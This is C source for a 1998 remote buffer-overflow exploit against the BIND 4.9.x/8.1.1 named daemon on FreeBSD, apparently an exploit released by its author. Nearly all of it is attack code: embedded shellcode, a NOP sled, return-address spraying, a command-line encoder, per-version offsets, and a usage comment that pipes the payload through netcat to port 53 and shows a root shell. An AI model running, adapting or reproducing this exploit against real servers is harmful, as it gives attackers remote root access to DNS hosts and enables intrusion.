/*
  remote bind 4.9.x exploit Example for FreeBSD (do not use!.)
  28-Apr-1998 by stran9er
  credits: bof-test.c written solely by Joshua J. Drake (jdrake@pulsar.net) 
  bug in: bind/named/ns_req.c:req_inquery()
*/
/*
  offsets: 4.9.6     min =  0		options fake-iquery
           4.9.6-REL min = -100
           8.1.1     min =  400		[ fake-iquery yes; ]
*/
/*
 Usage example:
  $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53                                                                             
  Adress: 0xefbfd444 Offset: 0                                                    
  sh: can't access tty; job control turned off                                    
  # whoami
  root
  #
*/
#define QUERY_LEN 0x600

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/nameser.h>

typedef struct {
	unsigned short int	r_class;		/* class number */
	unsigned short int	r_type;			/* type number */
	unsigned long int	r_ttl;			/* time to live */
	unsigned short int	r_size;			/* size of data area */
	char	r_data[QUERY_LEN];			/* pointer to data */
} rrecord;

char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02"
"\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16"
"\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88"
"\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1"
"\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21"
"\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F"
"\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21";
char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by   */
char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */

main(int argc, char **argv) {
   HEADER *h;
   rrecord *rr;
   char db[sizeof(HEADER)+sizeof(rrecord)+2];
   char *buf, *ptr;
   unsigned char cat[]="no";
   short int *buflen;
   unsigned long stack = 0xefbfd444, offset;
   int sh=1024,o,b,c,t;

   if ( (argc<3) || (*argv[2]!='/')) {
     printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]);
     exit(1);
   }
   offset=atoi(argv[1]);
   stack+=offset;
   fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset);
   buf=db;
   memset(buf, 0, sizeof(db));
   buflen=(short int *)buf;
   *buflen=htons(sizeof(db)-2);
   h = (HEADER *)(buf+2);
   h->id = rand() & 0xfff;
   h->opcode = IQUERY;
   h->ancount = htons(1);
   rr=(rrecord *)((char *)h+sizeof(HEADER)+1);
   rr->r_class= htons(C_IN);
   rr->r_type = htons(T_A);
   rr->r_ttl  = htonl(31337);
   rr->r_size = htons(QUERY_LEN+1);
   ptr=rr->r_data+1;
   memset(ptr,0x90,QUERY_LEN);
   ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */
   for(c=sh;c<=(QUERY_LEN-4);) {
      if ((c+4) > (QUERY_LEN-4)) stack +=4;
      ptr[c++] =  stack & 0x000000ff;
      ptr[c++] = (stack & 0x0000ff00) >> 8;
      ptr[c++] = (stack & 0x00ff0000) >> 16;
      ptr[c++] = (stack & 0xff000000) >> 24;
   }
   strcpy(ptr+sh,shellc);
   for (b=2;b<argc;b++) strcat(ptr,neshel1);
                        strcat(ptr,neshel2);
   for (b=2;b<argc;b++) {
    for (c=0;c<strlen(argv[b]);c++) {
     cat[0]=argv[b][c]-'Z';
     cat[1]='Z';
     if (!cat[0]) break;
     for (t=0,o=-1;t!=o;) {
        o=t;
        if ((cat[0]!=0) && (cat[0]<=32)) { cat[0]++; cat[1]--; t++; }
        if (cat[1]<=32) { cat[0]++; cat[1]--; t++; }
        if   (!cat[0]) {fprintf (stderr,"can't encode command line\n") ; exit(1);}
     }
     strcat(ptr,(char *)cat);
    }
    if ( b != (argc - 1) ) strcat (ptr,"\xf0\x10"); 
   }
  strcat(ptr,"\x80\x80");
  ptr[strlen(ptr)]=9;

  write(1,buf,sizeof(db));
}